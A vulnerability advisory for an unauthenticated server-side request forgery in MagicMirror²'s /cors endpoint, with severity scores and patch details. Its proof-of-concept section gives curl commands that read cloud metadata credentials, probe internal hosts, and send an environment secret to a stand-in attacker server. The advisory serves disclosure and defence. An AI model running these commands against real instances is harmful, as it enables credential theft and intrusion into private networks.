MagicMirror vulnerable to unauthenticated SSRF via /cors endpoint

Description

Summary

An unauthenticated Server-Side Request Forgery (SSRF) vulnerability in the /cors endpoint allows any remote attacker to force the MagicMirror² server to perform arbitrary HTTP requests to internal networks, cloud metadata services, and localhost services. The endpoint also expands environment variable placeholders (**VAR_NAME**), enabling exfiltration of server-side secrets.

Details

The /cors endpoint in js/server_functions.js (function cors(), lines 37-78) acts as an open HTTP proxy with no authentication and no URL validation. Any user-supplied URL is fetched server-side via fetch() and the full response is returned to the caller.

Additionally, the replaceSecretPlaceholder() function (lines 21-25) expands any **VARIABLE_NAME** pattern in the URL with the corresponding process.env value before the request is made, allowing an attacker to exfiltrate environment variables (e.g. API keys, tokens, database credentials).

Vulnerable code path:

GET /cors?url=<attacker-controlled-url>
  → replaceSecretPlaceholder(url)     // expands **ENV_VAR** → process.env.ENV_VAR
  → fetch(url)                        // no validation, no blocklist
  → response returned to attacker     // full body, status, headers

Key issues:
- No authentication required
- No URL validation or blocklist for private/reserved IP ranges
- No restriction on URL scheme or destination
- Environment variable expansion in URL before fetch

PoC

Prerequisites: a running MagicMirror² instance accessible on the network (default: http://<host>:8080).

1. Basic SSRF — access cloud metadata (AWS IMDSv1):

curl "http://<target>:8080/cors?url=http://169.254.169.254/latest/meta-data/"

If the server runs on AWS EC2 without IMDSv2 enforcement, this returns instance metadata including IAM role credentials.

2. Internal network scanning:

curl "http://<target>:8080/cors?url=http://192.168.1.1/"
curl "http://<target>:8080/cors?url=http://127.0.0.1:3000/"

The attacker can probe internal services by observing response status codes and timing.

3. Environment variable exfiltration:

curl "http://<target>:8080/cors?url=http://<attacker-server>/?leak=**SECRET_API_KEY**"

The server expands **SECRET_API_KEY** to the value of process.env.SECRET_API_KEY before making the request, sending the secret to the attacker-controlled server as a query parameter.

Impact

  • Cloud deployments (AWS/GCP/Azure): full compromise of cloud instance credentials via metadata service (169.254.169.254), potentially leading to lateral movement within the cloud account
  • Internal network access: the server becomes a proxy to scan and interact with services on internal networks that are not directly reachable by the attacker
  • Secret exfiltration: environment variables containing API keys, database credentials, or other sensitive configuration are directly readable
  • Affected users: anyone running MagicMirror² exposed to an untrusted network (including LAN). The /cors endpoint requires no authentication, so any host that can reach the MagicMirror HTTP port can exploit this vulnerability

Basic information

Type
reviewed
Severity
critical
Advisory on GitHub
Open advisory ↗
Repository advisory
Open repository advisory ↗
Source code
Browse source ↗
Published (advisory)
2026-05-05 20:53:59 UTC
Updated
2026-06-08 23:14:14 UTC
GitHub reviewed
2026-05-05 20:53:59 UTC
NVD published
2026-05-14

EPSS Score

Score Percentile
3.26% 87.31%

CVSS Scores

Base score Version Severity Vector
8.6 3.1
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N Click to expand
Attack vector (AV:N)
Could be attacked over the internet or any normal routed network—not just someone sitting at the machine.
Attack complexity (AC:L)
Once they can reach the bug, pulling it off is straightforward—no weird race conditions or rare setup.
Privileges required (PR:N)
No account or special rights needed—anonymous or random user is enough.
User interaction (UI:N)
Nobody has to click “OK” or open a trap file; it can work without a victim helping.
Scope (S:C)
Breaking this can reach past the original component and bite other resources—bigger blast radius.
Confidentiality (C:H)
Serious risk that confidential data gets exposed in a big way.
Integrity (I:N)
Data isn’t meaningfully altered or forged.
Availability (A:N)
Service keeps running; no real outage angle.
9.2 4.0
CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:H/SI:N/SA:N Click to expand
Attack vector (AV:N)
Could be attacked over the internet or any normal routed network.
Attack complexity (AC:L)
Exploitation conditions are straightforward and stable.
Attack requirements (AT:N)
No additional preconditions are required beyond normal reachability.
Privileges required (PR:N)
No privileges are required.
User interaction (UI:N)
No user interaction is required.
Vulnerable system confidentiality impact (VC:H)
High confidentiality impact on the vulnerable system.
Vulnerable system integrity impact (VI:N)
No integrity impact on the vulnerable system.
Vulnerable system availability impact (VA:N)
No availability impact on the vulnerable system.
Subsequent system confidentiality impact (SC:H)
High confidentiality impact on subsequent systems.
Subsequent system integrity impact (SI:N)
No integrity impact on subsequent systems.
Subsequent system availability impact (SA:N)
No availability impact on subsequent systems.

Identifiers

CWEs

CWE id Name
CWE-918 Server-Side Request Forgery (SSRF)

Credits

  • Astaruf (reporter)

Affected packages (1)

Vulnerable version ranges and first patched releases as published by GitHub.

Ecosystem Package Vulnerable range First patched Vulnerable functions
npm magicmirror <= 2.35.0 2.36.0

References

cvelogic Threat Intelligence